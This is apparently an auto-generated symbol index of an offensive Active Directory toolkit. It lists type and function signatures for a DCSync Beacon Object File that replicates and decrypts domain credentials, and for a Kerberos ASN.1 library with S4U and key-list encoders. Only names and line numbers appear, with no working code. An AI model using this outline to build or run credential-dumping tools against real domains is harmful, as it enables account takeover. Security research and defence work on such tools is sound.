type DS_REPL_CURSOR_3W (line 587) | typedef /* */ struct __MIDL_drsuapi_0056
type DS_REPL_CURSORS_3W (line 595) | typedef /* */ struct __MIDL_drsuapi_0057
type DS_REPL_ATTR_META_DATA_2 (line 602) | typedef /* */ struct __MIDL_drsuapi_0058
type DS_REPL_OBJ_META_DATA_2 (line 613) | typedef /* */ struct __MIDL_drsuapi_0059
type DS_REPL_VALUE_META_DATA_2 (line 620) | typedef /* */ struct __MIDL_drsuapi_0060
type DS_REPL_ATTR_VALUE_META_DATA_2 (line 636) | typedef /* */ struct __MIDL_drsuapi_0061
type DRS_EXTENSIONS (line 643) | typedef /* */ struct __MIDL_drsuapi_0062
type DRS_MSG_GETCHGREQ_V3 (line 649) | typedef /* */ struct __MIDL_drsuapi_0063
type DRS_MSG_GETCHGREQ_V4 (line 664) | typedef /* */ struct __MIDL_drsuapi_0064
type DRS_MSG_GETCHGREQ_V7 (line 671) | typedef /* */ struct __MIDL_drsuapi_0065
type DRS_MSG_GETCHGREPLY_V1 (line 681) | typedef /* */ struct __MIDL_drsuapi_0066
type DRS_MSG_GETCHGREPLY_V6 (line 697) | typedef /* */ struct __MIDL_drsuapi_0067
type DRS_MSG_GETCHGREPLY_V9 (line 718) | typedef /* */ struct __MIDL_drsuapi_0068
type DRS_COMPRESSED_BLOB (line 739) | typedef /* */ struct __MIDL_drsuapi_0069
type DRS_MSG_GETCHGREQ_V5 (line 746) | typedef /* */ struct __MIDL_drsuapi_0070
type DRS_MSG_GETCHGREQ_V8 (line 760) | typedef /* */ struct __MIDL_drsuapi_0071
type DRS_MSG_GETCHGREQ_V10 (line 777) | typedef /* */ struct __MIDL_drsuapi_0072
type VAR_SIZE_BUFFER_WITH_VERSION (line 795) | typedef /* */ struct __MIDL_drsuapi_0073
type DRS_MSG_GETCHGREQ_V11 (line 803) | typedef /* */ struct __MIDL_drsuapi_0074
type DRS_MSG_GETCHGREQ (line 823) | typedef /* [switch_type] */ union __MIDL_drsuapi_0075
type DRS_MSG_GETCHGREPLY_V2 (line 833) | typedef /* */ struct __MIDL_drsuapi_0076
type DRS_COMP_ALG_TYPE (line 838) | typedef /* */
type DRS_MSG_GETCHGREPLY_V7 (line 847) | typedef /* */ struct __MIDL_drsuapi_0078
type DRS_MSG_GETCHGREPLY (line 854) | typedef /* [switch_type] */ union __MIDL_drsuapi_0079
type DRS_MSG_REPSYNC_V1 (line 863) | typedef /* */ struct __MIDL_drsuapi_0080
type DRS_MSG_REPSYNC_V2 (line 871) | typedef /* */ struct __MIDL_drsuapi_0081
type DRS_MSG_REPSYNC (line 881) | typedef /* [switch_type] */ union __MIDL_drsuapi_0082
type DRS_MSG_UPDREFS_V1 (line 887) | typedef /* */ struct __MIDL_drsuapi_0083
type DRS_MSG_UPDREFS_V2 (line 895) | typedef /* */ struct __MIDL_drsuapi_0084
type DRS_MSG_UPDREFS (line 905) | typedef /* [switch_type] */ union __MIDL_drsuapi_0085
type DRS_MSG_REPADD_V1 (line 911) | typedef /* */ struct __MIDL_drsuapi_0086
type DRS_MSG_REPADD_V2 (line 919) | typedef /* */ struct __MIDL_drsuapi_0087
type DRS_MSG_REPADD_V3 (line 929) | typedef /* */ struct __MIDL_drsuapi_0088
type DRS_MSG_REPADD (line 941) | typedef /* [switch_type] */ union __MIDL_drsuapi_0089
type DRS_MSG_REPDEL_V1 (line 948) | typedef /* */ struct __MIDL_drsuapi_0090
type DRS_MSG_REPDEL (line 955) | typedef /* [switch_type] */ union __MIDL_drsuapi_0091
type DRS_MSG_REPMOD_V1 (line 960) | typedef /* */ struct __MIDL_drsuapi_0092
type DRS_MSG_REPMOD (line 971) | typedef /* [switch_type] */ union __MIDL_drsuapi_0093
type DRS_MSG_VERIFYREQ_V1 (line 976) | typedef /* */ struct __MIDL_drsuapi_0094
type DRS_MSG_VERIFYREQ (line 985) | typedef /* [switch_type] */ union __MIDL_drsuapi_0095
type DRS_MSG_VERIFYREPLY_V1 (line 990) | typedef /* */ struct __MIDL_drsuapi_0096
type DRS_MSG_VERIFYREPLY (line 998) | typedef /* [switch_type] */ union __MIDL_drsuapi_0097
type REVERSE_MEMBERSHIP_OPERATION_TYPE (line 1003) | typedef /* */
type DRS_MSG_REVMEMB_REQ_V1 (line 1015) | typedef /* */ struct __MIDL_drsuapi_0099
type DRS_MSG_REVMEMB_REQ (line 1024) | typedef /* [switch_type] */ union __MIDL_drsuapi_0100
type DRS_MSG_REVMEMB_REPLY_V1 (line 1029) | typedef /* */ struct __MIDL_drsuapi_0101
type DRS_MSG_REVMEMB_REPLY (line 1039) | typedef /* [switch_type] */ union __MIDL_drsuapi_0102
type DRS_MSG_MOVEREQ_V1 (line 1044) | typedef /* */ struct __MIDL_drsuapi_0103
type DRS_SecBuffer (line 1053) | typedef /* */ struct __MIDL_drsuapi_0104
type DRS_SecBufferDesc (line 1060) | typedef /* */ struct __MIDL_drsuapi_0105
type DRS_MSG_MOVEREQ_V2 (line 1067) | typedef /* */ struct __MIDL_drsuapi_0106
type DRS_MSG_MOVEREQ (line 1078) | typedef /* [switch_type] */ union __MIDL_drsuapi_0107
type DRS_MSG_MOVEREPLY_V1 (line 1084) | typedef /* */ struct __MIDL_drsuapi_0108
type DRS_MSG_MOVEREPLY_V2 (line 1091) | typedef /* */ struct __MIDL_drsuapi_0109
type DRS_MSG_MOVEREPLY (line 1097) | typedef /* [switch_type] */ union __MIDL_drsuapi_0110
type DRS_MSG_CRACKREQ_V1 (line 1103) | typedef /* */ struct __MIDL_drsuapi_0111
type DRS_MSG_CRACKREQ (line 1114) | typedef /* [switch_type] */ union __MIDL_drsuapi_0112
type DRS_MSG_CRACKREPLY_V1 (line 1119) | typedef /* */ struct __MIDL_drsuapi_0113
type DRS_MSG_CRACKREPLY (line 1124) | typedef /* [switch_type] */ union __MIDL_drsuapi_0114
type DRS_MSG_NT4_CHGLOG_REQ_V1 (line 1129) | typedef /* */ struct __MIDL_drsuapi_0115
type DRS_MSG_NT4_CHGLOG_REQ (line 1137) | typedef /* [switch_type] */ union __MIDL_drsuapi_0116
type NT4_REPLICATION_STATE (line 1142) | typedef /* */ struct __MIDL_drsuapi_0117
type DRS_MSG_NT4_CHGLOG_REPLY_V1 (line 1152) | typedef /* */ struct __MIDL_drsuapi_0118
type DRS_MSG_NT4_CHGLOG_REPLY (line 1162) | typedef /* [switch_type] */ union __MIDL_drsuapi_0119
type DRS_MSG_SPNREQ_V1 (line 1167) | typedef /* */ struct __MIDL_drsuapi_0120
type DRS_MSG_SPNREQ (line 1176) | typedef /* [switch_type] */ union __MIDL_drsuapi_0121
type DRS_MSG_SPNREPLY_V1 (line 1181) | typedef /* */ struct __MIDL_drsuapi_0122
type DRS_MSG_SPNREPLY (line 1186) | typedef /* [switch_type] */ union __MIDL_drsuapi_0123
type DRS_MSG_RMSVRREQ_V1 (line 1191) | typedef /* */ struct __MIDL_drsuapi_0124
type DRS_MSG_RMSVRREQ (line 1198) | typedef /* [switch_type] */ union __MIDL_drsuapi_0125
type DRS_MSG_RMSVRREPLY_V1 (line 1203) | typedef /* */ struct __MIDL_drsuapi_0126
type DRS_MSG_RMSVRREPLY (line 1208) | typedef /* [switch_type] */ union __MIDL_drsuapi_0127
type DRS_MSG_RMDMNREQ_V1 (line 1213) | typedef /* */ struct __MIDL_drsuapi_0128
type DRS_MSG_RMDMNREQ (line 1218) | typedef /* [switch_type] */ union __MIDL_drsuapi_0129
type DRS_MSG_RMDMNREPLY_V1 (line 1223) | typedef /* */ struct __MIDL_drsuapi_0130
type DRS_MSG_RMDMNREPLY (line 1228) | typedef /* [switch_type] */ union __MIDL_drsuapi_0131
type DRS_MSG_DCINFOREQ_V1 (line 1233) | typedef /* */ struct __MIDL_drsuapi_0132
type DRS_MSG_DCINFOREQ (line 1239) | typedef /* [switch_type] */ union __MIDL_drsuapi_0133
type DRS_MSG_DCINFOREPLY_V1 (line 1246) | typedef /* */ struct __MIDL_drsuapi_0134
type DRS_MSG_DCINFOREPLY_V2 (line 1252) | typedef /* */ struct __MIDL_drsuapi_0135
type DRS_MSG_DCINFOREPLY_V3 (line 1258) | typedef /* */ struct __MIDL_drsuapi_0136
type DRS_MSG_DCINFOREPLY_VFFFFFFFF (line 1264) | typedef /* */ struct __MIDL_drsuapi_0137
type DRS_MSG_DCINFOREPLY (line 1270) | typedef /* [switch_type] */ union __MIDL_drsuapi_0138
type DRS_MSG_ADDENTRYREQ_V1 (line 1278) | typedef /* */ struct __MIDL_drsuapi_0139
type DRS_MSG_ADDENTRYREQ_V2 (line 1284) | typedef /* */ struct __MIDL_drsuapi_0140
type DRS_MSG_ADDENTRYREQ_V3 (line 1289) | typedef /* */ struct __MIDL_drsuapi_0141
type DRS_MSG_ADDENTRYREQ (line 1295) | typedef /* [switch_type] */ union __MIDL_drsuapi_0142
type DRS_MSG_ADDENTRYREPLY_V1 (line 1302) | typedef /* */ struct __MIDL_drsuapi_0143
type ADDENTRY_REPLY_INFO (line 1313) | typedef /* */ struct __MIDL_drsuapi_0144
type DRS_MSG_ADDENTRYREPLY_V2 (line 1319) | typedef /* */ struct __MIDL_drsuapi_0145
type DRS_ERROR_DATA_V1 (line 1331) | typedef /* */ struct __MIDL_drsuapi_0146
type DRS_ERROR_DATA (line 1338) | typedef /* [switch_type] */ union __MIDL_drsuapi_0147
type DRS_MSG_ADDENTRYREPLY_V3 (line 1343) | typedef /* */ struct __MIDL_drsuapi_0148
type DRS_MSG_ADDENTRYREPLY (line 1352) | typedef /* [switch_type] */ union __MIDL_drsuapi_0149
type DRS_MSG_KCC_EXECUTE_V1 (line 1359) | typedef /* */ struct __MIDL_drsuapi_0150
type DRS_MSG_KCC_EXECUTE (line 1365) | typedef /* [switch_type] */ union __MIDL_drsuapi_0151
type DS_REPL_CLIENT_CONTEXT (line 1370) | typedef /* */ struct __MIDL_drsuapi_0152
type DS_REPL_CLIENT_CONTEXTS (line 1381) | typedef /* */ struct __MIDL_drsuapi_0153
type DS_REPL_SERVER_OUTGOING_CALL (line 1388) | typedef /* */ struct __MIDL_drsuapi_0154
type DS_REPL_SERVER_OUTGOING_CALLS (line 1400) | typedef /* */ struct __MIDL_drsuapi_0155
type DRS_MSG_GETREPLINFO_REQ_V1 (line 1407) | typedef /* */ struct __MIDL_drsuapi_0156
type DRS_MSG_GETREPLINFO_REQ_V2 (line 1414) | typedef /* */ struct __MIDL_drsuapi_0157
type DRS_MSG_GETREPLINFO_REQ (line 1425) | typedef /* [switch_type] */ union __MIDL_drsuapi_0158
type DRS_MSG_GETREPLINFO_REPLY (line 1431) | typedef /* [switch_type] */ union __MIDL_drsuapi_0159
type DRS_MSG_ADDSIDREQ_V1 (line 1450) | typedef /* */ struct __MIDL_drsuapi_0160
type DRS_MSG_ADDSIDREQ (line 1466) | typedef /* [switch_type] */ union __MIDL_drsuapi_0161
type DRS_MSG_ADDSIDREPLY_V1 (line 1471) | typedef /* */ struct __MIDL_drsuapi_0162
type DRS_MSG_ADDSIDREPLY (line 1476) | typedef /* [switch_type] */ union __MIDL_drsuapi_0163
type DRS_MSG_GETMEMBERSHIPS2_REQ_V1 (line 1481) | typedef /* */ struct __MIDL_drsuapi_0164
type DRS_MSG_GETMEMBERSHIPS2_REQ (line 1487) | typedef /* [switch_type] */ union __MIDL_drsuapi_0165
type DRS_MSG_GETMEMBERSHIPS2_REPLY_V1 (line 1492) | typedef /* */ struct __MIDL_drsuapi_0166
type DRS_MSG_GETMEMBERSHIPS2_REPLY (line 1498) | typedef /* [switch_type] */ union __MIDL_drsuapi_0167
type DRS_MSG_REPVERIFYOBJ_V1 (line 1503) | typedef /* */ struct __MIDL_drsuapi_0168
type DRS_MSG_REPVERIFYOBJ (line 1510) | typedef /* [switch_type] */ union __MIDL_drsuapi_0169
type DRS_MSG_EXISTREQ_V1 (line 1515) | typedef /* */ struct __MIDL_drsuapi_0170
type DRS_MSG_EXISTREQ (line 1524) | typedef /* [switch_type] */ union __MIDL_drsuapi_0171
type DRS_MSG_EXISTREPLY_V1 (line 1529) | typedef /* */ struct __MIDL_drsuapi_0172
type DRS_MSG_EXISTREPLY (line 1536) | typedef /* [switch_type] */ union __MIDL_drsuapi_0173
type DRS_MSG_QUERYSITESREQ_V1 (line 1541) | typedef /* */ struct __MIDL_drsuapi_0174
type DRS_MSG_QUERYSITESREQ (line 1549) | typedef /* [switch_type] */ union __MIDL_drsuapi_0175
type DRS_MSG_QUERYSITESREPLYELEMENT_V1 (line 1554) | typedef /* */ struct __MIDL_drsuapi_0176
type DRS_MSG_QUERYSITESREPLY_V1 (line 1560) | typedef /* */ struct __MIDL_drsuapi_0177
type DRS_MSG_QUERYSITESREPLY (line 1567) | typedef /* [switch_type] */ union __MIDL_drsuapi_0178
type DRS_MSG_INIT_DEMOTIONREQ_V1 (line 1572) | typedef /* */ struct __MIDL_drsuapi_0179
type DRS_MSG_INIT_DEMOTIONREQ (line 1577) | typedef /* [switch_type] */ union __MIDL_drsuapi_0180
type DRS_MSG_INIT_DEMOTIONREPLY_V1 (line 1582) | typedef /* */ struct __MIDL_drsuapi_0181
type DRS_MSG_INIT_DEMOTIONREPLY (line 1587) | typedef /* [switch_type] */ union __MIDL_drsuapi_0182
type DRS_MSG_REPLICA_DEMOTIONREQ_V1 (line 1592) | typedef /* */ struct __MIDL_drsuapi_0183
type DRS_MSG_REPLICA_DEMOTIONREQ (line 1599) | typedef /* [switch_type] */ union __MIDL_drsuapi_0184
type DRS_MSG_REPLICA_DEMOTIONREPLY_V1 (line 1604) | typedef /* */ struct __MIDL_drsuapi_0185
type DRS_MSG_REPLICA_DEMOTIONREPLY (line 1609) | typedef /* [switch_type] */ union __MIDL_drsuapi_0186
type DRS_MSG_FINISH_DEMOTIONREQ_V1 (line 1614) | typedef /* */ struct __MIDL_drsuapi_0187
type DRS_MSG_FINISH_DEMOTIONREQ (line 1621) | typedef /* [switch_type] */ union __MIDL_drsuapi_0188
type DRS_MSG_FINISH_DEMOTIONREPLY_V1 (line 1626) | typedef /* */ struct __MIDL_drsuapi_0189
type DRS_MSG_FINISH_DEMOTIONREPLY (line 1633) | typedef /* [switch_type] */ union __MIDL_drsuapi_0190
type DRS_MSG_ADDCLONEDCREQ_V1 (line 1638) | typedef /* */ struct __MIDL_drsuapi_0191
type DRS_MSG_ADDCLONEDCREQ (line 1644) | typedef /* [switch_type] */ union __MIDL_drsuapi_0192
type DRS_MSG_ADDCLONEDCREPLY_V1 (line 1649) | typedef /* */ struct __MIDL_drsuapi_0193
type DRS_MSG_ADDCLONEDCREPLY (line 1657) | typedef /* [switch_type] */ union __MIDL_drsuapi_0194
type DRS_MSG_WRITENGCKEYREQ_V1 (line 1662) | typedef struct _DRS_MSG_WRITENGCKEYREQ_V1
type DRS_MSG_WRITENGCKEYREQ (line 1669) | typedef /* [switch_type] */ union __MIDL_drsuapi_0195
type DRS_MSG_WRITENGCKEYREPLY_V1 (line 1674) | typedef struct _DRS_MSG_WRITENGCKEYREPLY_V1
type DRS_MSG_WRITENGCKEYREPLY (line 1679) | typedef /* [switch_type] */ union __MIDL_drsuapi_0196
type DRS_MSG_READNGCKEYREQ_V1 (line 1684) | typedef struct _DRS_MSG_READNGCKEYREQ_V1
type DRS_MSG_READNGCKEYREQ (line 1689) | typedef /* [switch_type] */ union __MIDL_drsuapi_0197
type DRS_MSG_READNGCKEYREPLY_V1 (line 1694) | typedef struct _DRS_MSG_READNGCKEYREPLY_V1
type DRS_MSG_READNGCKEYREPLY (line 1701) | typedef /* [switch_type] */ union __MIDL_drsuapi_0198
type DSA_MSG_EXECUTE_SCRIPT_REQ_V1 (line 1917) | typedef /* */ struct __MIDL_dsaop_0001
type DSA_MSG_EXECUTE_SCRIPT_REQ (line 1924) | typedef /* [switch_type] */ union __MIDL_dsaop_0002
type DSA_MSG_EXECUTE_SCRIPT_REPLY_V1 (line 1929) | typedef /* */ struct __MIDL_dsaop_0003
type DSA_MSG_EXECUTE_SCRIPT_REPLY (line 1935) | typedef /* [switch_type] */ union __MIDL_dsaop_0004
type DSA_MSG_PREPARE_SCRIPT_REQ_V1 (line 1940) | typedef /* */ struct __MIDL_dsaop_0005
type DSA_MSG_PREPARE_SCRIPT_REQ (line 1945) | typedef /* [switch_type] */ union __MIDL_dsaop_0006
type DSA_MSG_PREPARE_SCRIPT_REPLY_V1 (line 1950) | typedef /* */ struct __MIDL_dsaop_0007
type DSA_MSG_PREPARE_SCRIPT_REPLY (line 1962) | typedef /* [switch_type] */ union __MIDL_dsaop_0008
FILE: AD-BOF/DCSync-BOF/src/dcsync-all.c
function BytesToHex (line 8) | void BytesToHex(const BYTE* bytes, DWORD len, char* output) {
function RpcSecurityCallback (line 22) | void RPC_ENTRY RpcSecurityCallback(void *Context) {
function BOOL (line 46) | BOOL DecryptWithSessionKey(
function BOOL (line 122) | BOOL DecryptRC4WithRawKey(const BYTE* encData, DWORD encLen, const BYTE*...
function BOOL (line 162) | BOOL DecryptRC4(const BYTE* encData, DWORD encLen, const BYTE* rid, BYTE...
function BOOL (line 200) | BOOL DecryptDESWithRid(const BYTE* encData, DWORD rid, BYTE* output) {
function DWORD (line 206) | DWORD HexToBinary(const BYTE* hexData, DWORD hexLen, BYTE* binaryOut) {
function BOOL (line 234) | BOOL ParseKerberosKeys(const BYTE* propertyData, DWORD propertyLen, cons...
function InitDRSRequest (line 467) | void InitDRSRequest(DRS_MSG_GETCHGREQ* request, const GUID* dcGuid, DSNA...
function DSNAME (line 491) | DSNAME* BuildDSName(const char* dn, const GUID* guid) {
function RPC_BINDING_HANDLE (line 535) | RPC_BINDING_HANDLE CreateDRSBinding(const char* dcHostname) {
function DRS_HANDLE (line 593) | DRS_HANDLE BindToDRS(RPC_BINDING_HANDLE rpcBinding) {
function DWORD (line 635) | DWORD GetRIDFromSID(const BYTE* sid, DWORD sidLen) {
function ProcessCredentials (line 649) | void ProcessCredentials(REPLENTINFLIST* objects, const char* samAccountN...
function go (line 931) | void go(char *args, int alen) {
FILE: AD-BOF/DCSync-BOF/src/dcsync-single.c
function BytesToHex (line 7) | void BytesToHex(const BYTE* bytes, DWORD len, char* output) {
function RpcSecurityCallback (line 21) | void RPC_ENTRY RpcSecurityCallback(void *Context) {
function BOOL (line 45) | BOOL DecryptWithSessionKey(const BYTE* encryptedData, DWORD encryptedLen...
function BOOL (line 114) | BOOL DecryptRC4WithRawKey(const BYTE* encData, DWORD encLen, const BYTE*...
function BOOL (line 154) | BOOL DecryptRC4(const BYTE* encData, DWORD encLen, const BYTE* rid, BYTE...
function BOOL (line 192) | BOOL DecryptDESWithRid(const BYTE* encData, DWORD rid, BYTE* output) {
function DWORD (line 196) | DWORD HexToBinary(const BYTE* hexData, DWORD hexLen, BYTE* binaryOut) {
function BOOL (line 224) | BOOL ParseKerberosKeys(const BYTE* propertyData, DWORD propertyLen, cons...
function InitDRSRequest (line 455) | void InitDRSRequest(DRS_MSG_GETCHGREQ* request, const GUID* dcGuid, DSNA...
function DSNAME (line 480) | DSNAME* BuildDSName(const char* dn, const GUID* guid) {
function RPC_BINDING_HANDLE (line 524) | RPC_BINDING_HANDLE CreateDRSBinding(const char* dcHostname) {
function DRS_HANDLE (line 582) | DRS_HANDLE BindToDRS(RPC_BINDING_HANDLE rpcBinding) {
function DWORD (line 624) | DWORD GetRIDFromSID(const BYTE* sid, DWORD sidLen) {
function ProcessCredentials (line 638) | void ProcessCredentials(REPLENTINFLIST* objects, const char* samAccountN...
function go (line 920) | void go(char *args, int alen) {
FILE: AD-BOF/DCSync-BOF/util/ldap_common.c
function BOOLEAN (line 26) | BOOLEAN ServerCertCallback(PLDAP Connection, PCCERT_CONTEXT pServerCert) {
function wchar_t (line 31) | wchar_t* CharToWChar(const char* str) {
function LDAP (line 57) | LDAP* InitializeLDAPConnection(const char* dcAddress, BOOL useLdaps, cha...
function DC_CONTEXT (line 173) | DC_CONTEXT* GetDCContext(LDAP* ld, const char* dcHostname) {
function FreeDCContext (line 313) | void FreeDCContext(DC_CONTEXT* context) {
function USER_LDAP_INFO (line 322) | USER_LDAP_INFO* GetUserInfo(LDAP* ld, const char* identifier, const char...
function FreeUserInfo (line 421) | void FreeUserInfo(USER_LDAP_INFO* userInfo) {
function CleanupLDAP (line 429) | void CleanupLDAP(LDAP* ld) {
FILE: AD-BOF/DCSync-BOF/util/ldap_syncall.c
type USER_INFO (line 17) | typedef struct _USER_INFO {
function USER_INFO (line 26) | USER_INFO* EnumerateAllUsers(LDAP* ld, const char* searchBase, int* user...
function FreeUserInfoArray (line 126) | void FreeUserInfoArray(USER_INFO* users, int userCount) {
FILE: AD-BOF/DCSync-BOF/util/rpc-adapter.c
function MIDL_user_free (line 23) | void __RPC_USER MIDL_user_free(void* ptr) {
FILE: AD-BOF/Kerbeus-BOF/_include/asn_convert.c
function TagLength (line 8) | int TagLength(int tagValue) {
function LengthLength (line 15) | int LengthLength(int vlen) {
function EncodedLength (line 22) | int EncodedLength(AsnElt* a) {
function ValueLength (line 30) | int ValueLength(AsnElt* a) {
function EncodeValue (line 47) | int EncodeValue(AsnElt* a, int start, int end, byte* dst, int dstOff) {
function AsnToBytesEncode5 (line 72) | int AsnToBytesEncode5(AsnElt* a, int start, int end, byte* dst, int dstO...
function AsnToBytesEncode3 (line 140) | int AsnToBytesEncode3(AsnElt* a, byte* dst, int dstOff) {
function AsnToBytesEncode (line 144) | bool AsnToBytesEncode(AsnElt* a, int* size, byte** ret) {
FILE: AD-BOF/Kerbeus-BOF/_include/asn_decode.c
function CheckOff (line 6) | bool CheckOff(int off, int lim) {
function Dec2 (line 12) | int Dec2(byte* s, int off, bool* good) {
function IndexOf (line 26) | int IndexOf(byte* str, int len, byte c) {
function CheckTag (line 37) | bool CheckTag(AsnElt* a, int tc, int tv) {
function ValueByte (line 43) | bool ValueByte(AsnElt* a, int off, int* ret) {
function CopyValue3 (line 67) | int CopyValue3(AsnElt* a, byte* dst, int off) {
function DecodeUTF8 (line 73) | bool DecodeUTF8(byte* buf, int off, int len, byte** ret, int* ret_length) {
function DecodeMono (line 136) | bool DecodeMono(byte* buf, int off, int len, int type, byte** outBuf, in...
function DecodeNoCopyLength (line 145) | bool DecodeNoCopyLength(byte* buf, int off, int len, int* ret) {
function DecodeNoCopy (line 164) | bool DecodeNoCopy(byte* buf, int off, int len, AsnElt* a) {
function BytesToAsnDecode9 (line 221) | bool BytesToAsnDecode9(byte* buf, int off, int maxLen, int* tc, int* tv,...
function BytesToAsnDecode4 (line 305) | bool BytesToAsnDecode4(byte* buf, int off, int len, bool exactLength, As...
function BytesToAsnDecode3 (line 319) | bool BytesToAsnDecode3(byte* buf, int len, bool exactLength, AsnElt* a) {
function BytesToAsnDecode (line 323) | bool BytesToAsnDecode(byte* buf, int len, AsnElt* a) {
function AsnGetInteger (line 329) | bool AsnGetInteger(AsnElt* a, long* ret) {
function AsnGetOctetString3 (line 380) | bool AsnGetOctetString3(AsnElt* a, byte* dst, int off, int* ret) {
function AsnGetOctetString (line 408) | bool AsnGetOctetString(AsnElt* a, byte** ret, int* len) {
function AsnGetString (line 423) | bool AsnGetString(AsnElt* a, byte** ret) {
function AsnGetPrincipalName (line 435) | bool AsnGetPrincipalName(AsnElt* a, PrincipalName* pname) {
function AsnGetEncryptedData (line 455) | bool AsnGetEncryptedData(AsnElt* a, EncryptedData* encdata) {
function AsnGetTicket (line 477) | bool AsnGetTicket(AsnElt* a, Ticket* ticket) {
function AsnGetErrorCode (line 501) | bool AsnGetErrorCode(AsnElt* a, uint* error) {
function AsnGetEncryptionKey (line 514) | bool AsnGetEncryptionKey(AsnElt* a, EncryptionKey* enc_key) {
function AsnGetEncryptionKeySafe (line 536) | bool AsnGetEncryptionKeySafe(AsnElt* keyElt, EncryptionKey* destKey) {
function NodeAsnGetSting (line 565) | bool NodeAsnGetSting(AsnElt* a, int type, int* len, byte** ret) {
function AsnGetTime2 (line 589) | bool AsnGetTime2(AsnElt* a, int type, DateTime* dt) {
function AsnGetTime (line 709) | bool AsnGetTime(AsnElt* a, DateTime* dt) {
function AsnGetLastReq (line 717) | bool AsnGetLastReq(AsnElt* a, LastReq* last_req) {
function AsnGetEncryptedPAData (line 736) | bool AsnGetEncryptedPAData(AsnElt* body, EncryptedPAData* data) {
function AsnGetEncKDCRepPart (line 809) | bool AsnGetEncKDCRepPart(AsnElt* a, EncKDCRepPart* rep_part) {
function AsnGetKrbCredInfo (line 856) | bool AsnGetKrbCredInfo(AsnElt* body, KrbCredInfo* info) {
function AsnGetEncKrbCredPart (line 895) | bool AsnGetEncKrbCredPart(AsnElt* body, EncKrbCredPart* cred_part) {
function AsnGetKrbCred (line 913) | bool AsnGetKrbCred(AsnElt* body, KRB_CRED* cred) {
function AsnGet_ETYPE_INFO2_ENTRY (line 943) | bool AsnGet_ETYPE_INFO2_ENTRY(AsnElt* body, ETYPE_INFO2_ENTRY* entry) {
function AsnGetPaData (line 961) | bool AsnGetPaData(AsnElt* body, PA_DATA* padata) {
function AsnGetTGS_REP (line 1004) | bool AsnGetTGS_REP(AsnElt* asn_TGS_REP, TGS_REP* tgs_rep) {
FILE: AD-BOF/Kerbeus-BOF/_include/asn_encode.c
function my_wcslen (line 4) | size_t my_wcslen(const wchar_t* str) {
function DateTime (line 13) | DateTime GetLocalTimeAdd(uint add) {
function DateTime (line 36) | DateTime GetGmTimeAdd(UINT add) {
function IsLittleEndian (line 60) | bool IsLittleEndian() {
function ReverseBytes (line 65) | void ReverseBytes(byte* bytes, size_t length) {
function FlasToBytes (line 74) | void FlasToBytes(UINT32 Options, byte* OptionsBytes) {
function CodePoint (line 82) | int CodePoint(wchar_t* str, int* offset) {
function EncodeMono (line 94) | bool EncodeMono(wchar_t* str, int* len, byte** ms) {
function EncodeUTF8 (line 105) | bool EncodeUTF8(wchar_t* str, int* len, byte** ms) {
function EncodeUTF16 (line 136) | bool EncodeUTF16(const wchar_t* str, int* lenr, byte** buf) {
function EncodeUTF32 (line 149) | bool EncodeUTF32(const wchar_t* str, int* len, byte** ms) {
function MakePrimitiveInner (line 168) | bool MakePrimitiveInner(int tagClass, int tagValue, byte* val, int off, ...
function MakeIntegerLong (line 184) | bool MakeIntegerLong(long long x, AsnElt* asn_elt) {
function Make4 (line 204) | bool Make4(int tagClass, int tagValue, AsnElt* subs, int subsCount, AsnE...
function Make3 (line 236) | bool Make3(int tagValue, AsnElt* subs, int subsCount, AsnElt* a) {
function MakeBlob (line 240) | bool MakeBlob(byte* buf, int off, int len, AsnElt* a) {
function MakeExplicit (line 244) | bool MakeExplicit(int tagClass, int tagValue, AsnElt* subs, int subsCoun...
function MakeImplicit (line 248) | bool MakeImplicit(int tagClass, int tagValue, AsnElt* x, AsnElt* a) {
function MakeBitString (line 274) | bool MakeBitString(byte* buf, size_t off, size_t len, AsnElt* a) {
function MakeString (line 284) | bool MakeString(int type, char* str, AsnElt* a) {
function PackIntegerLong (line 307) | bool PackIntegerLong(int tagValue, int var, AsnElt* varSeqContext) {
function PackString (line 317) | bool PackString(int tagValue, int type, char* var, AsnElt* varSeqContext){
function PackStringExt (line 326) | bool PackStringExt(int tagValue, int type, int imp_type, char* var, AsnE...
function PackBitString (line 336) | bool PackBitString(int tagValue, byte* var, int varLen, AsnElt* varSeqCo...
function PackBlock (line 345) | bool PackBlock(int tagValue, byte* var, int varLen, AsnElt* varSeqContex...
function AsnEncTimeStampToPaDataEncode (line 356) | bool AsnEncTimeStampToPaDataEncode(EncryptionKey encKey, PA_DATA* pa_dat...
function AsnPrincipalNameEncode (line 391) | bool AsnPrincipalNameEncode(PrincipalName* cname, AsnElt* RET) {
function AsnHostAddressEncode (line 418) | bool AsnHostAddressEncode(HostAddress* addr, AsnElt* seq) {
function AsnKerbPaPacRequestEncode (line 436) | bool AsnKerbPaPacRequestEncode(KERB_PA_PAC_REQUEST* value, AsnElt* total...
function AsnEncryptedDataEncode (line 449) | bool AsnEncryptedDataEncode(EncryptedData* value, AsnElt* totalSeq) {
function AsnEncryptionKeyEncode (line 473) | bool AsnEncryptionKeyEncode(EncryptionKey* key, AsnElt* seq2) {
function AsnTicketEncode (line 490) | bool AsnTicketEncode(Ticket* ticket, AsnElt* totalSeq2Context) {
function AsnKDCReqBodyEncode (line 519) | bool AsnKDCReqBodyEncode(KDCReqBody* req_body, AsnElt* RET) {
function AsnChecksumEncode (line 635) | bool AsnChecksumEncode(Checksum* cksum, AsnElt* totalSeq2) {
function AsnAuthenticatorEncode (line 651) | bool AsnAuthenticatorEncode(Authenticator* authenticator, AsnElt* finalC...
function AsnApReqEncode (line 721) | bool AsnApReqEncode(AP_REQ* value, AsnElt* totalSeqContext) {
function AsnS4UUserIDEncode (line 782) | bool AsnS4UUserIDEncode(S4UUserID* id, AsnElt* seqContext) {
function AsnPaPacOptionsEncode (line 809) | bool AsnPaPacOptionsEncode(PA_PAC_OPTIONS* value, AsnElt* seq) {
function AsnPaS4USelfEnc (line 818) | bool AsnPaS4USelfEnc(PA_FOR_USER* value, AsnElt* seq) {
function AsnPaS4Ux509UserEnc (line 843) | bool AsnPaS4Ux509UserEnc(PA_S4U_X509_USER* value, AsnElt* seq) {
function AsnPaKeyListReqEncode (line 859) | bool AsnPaKeyListReqEncode(PA_KEY_LIST_REQ* value, AsnElt* seq) {
function AsnPaDataEncode (line 866) | bool AsnPaDataEncode(PA_DATA padata, AsnElt* seq) {
function AsnKrbCredInfoEncode (line 984) | bool AsnKrbCredInfoEncode(KrbCredInfo* cred_info, AsnElt* seq) {
function AsnEncKrbCredPartEncode (line 1081) | bool AsnEncKrbCredPartEncode(EncKrbCredPart* cred_part, AsnElt* totalSeq...
